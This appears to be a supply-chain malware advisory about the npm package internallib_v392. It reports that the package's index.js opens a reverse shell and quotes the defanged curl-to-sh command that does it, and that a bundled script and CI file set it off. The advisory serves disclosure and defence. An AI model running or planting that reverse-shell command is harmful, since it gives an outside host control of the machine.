LWA-2026-11042 confirmed malware

internallib_v392@1.0.3

Malicious code in internallib_v392 (npm)

T1059.007 · JavaScriptT1071.001 · Web ProtocolsT1105 · Ingress Tool Transfer

Analysis

The package's index.js exports a command() function that executes a reverse shell via `curl hxxps://reverse-shell[.]sh/10[.]0[.]72[.]234:443|sh` through /bin/bash. The bundled check.js requires the package and invokes command(), and the included .gitlab-ci.yml runs `node check.js`, so requiring the package establishes a reverse shell to 10[.]0[.]72[.]234:443 via the reverse-shell.sh service.

analyzed by
Leitwacht
first seen
Aug 12, 2026, 01:21 PM
analyzed
Aug 12, 2026, 01:21 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.